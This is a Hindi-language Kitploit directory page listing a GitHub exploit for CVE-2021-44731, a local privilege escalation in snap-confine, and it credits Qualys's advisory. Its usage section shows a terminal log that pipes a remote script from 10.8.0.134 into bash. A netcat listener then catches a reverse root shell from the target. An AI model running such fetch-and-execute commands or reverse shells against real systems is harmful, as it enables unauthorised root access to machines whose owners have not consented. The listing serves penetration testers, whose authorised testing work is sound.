Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44731-snap-confine-SUID — लोकल प्रिविलेज एस्केलेशन एक्सप्लॉइट CVE-2021-44731 के लिए जो snap-confine के संस्करण 2.54.2 और उससे निचले संस्करणों को लक्षित करता है। स्वचालित रूप से कमजोर बाइनरी का पता लगाता है और netcat के माध्यम से रूट शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/deeexcee-io/cve-2021-44731-snap-confine-suid
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubdeeexcee-io/cve-2021-44731-snap-confine-suid

CVE-2021-44731-snap-confine-SUID

लोकल प्रिविलेज एस्केलेशन एक्सप्लॉइट CVE-2021-44731 के लिए जो snap-confine के संस्करण 2.54.2 और उससे निचले संस्करणों को लक्षित करता है। स्वचालित रूप से कमजोर बाइनरी का पता लगाता है और netcat के माध्यम से रूट शेल प्रदान करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4213 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-44731-snap-confine-SUID

CVE-2021-44731, snap-confine 2.54.2 और उससे निचले संस्करणों के लिए स्थानीय विशेषाधिकार वृद्धि शोषण

इसे खोजने और विस्तृत शोषण प्रदान करने के लिए सारा श्रेय Qualys को जाता है।

https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt

त्वरित और गंदा snap-confine LPE। snap-confine के कमजोर संस्करण की खोज करेगा, यदि मिला तो शोषण करेगा।

रूट शेल लौटाता है, netcat से पकड़ें

root@kitploit:~
$id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchain)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2073  100  2073    0     0  28397      0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3

रूट शेल

root@kitploit:~
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447    
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/# 
टूल डाउनलोड करें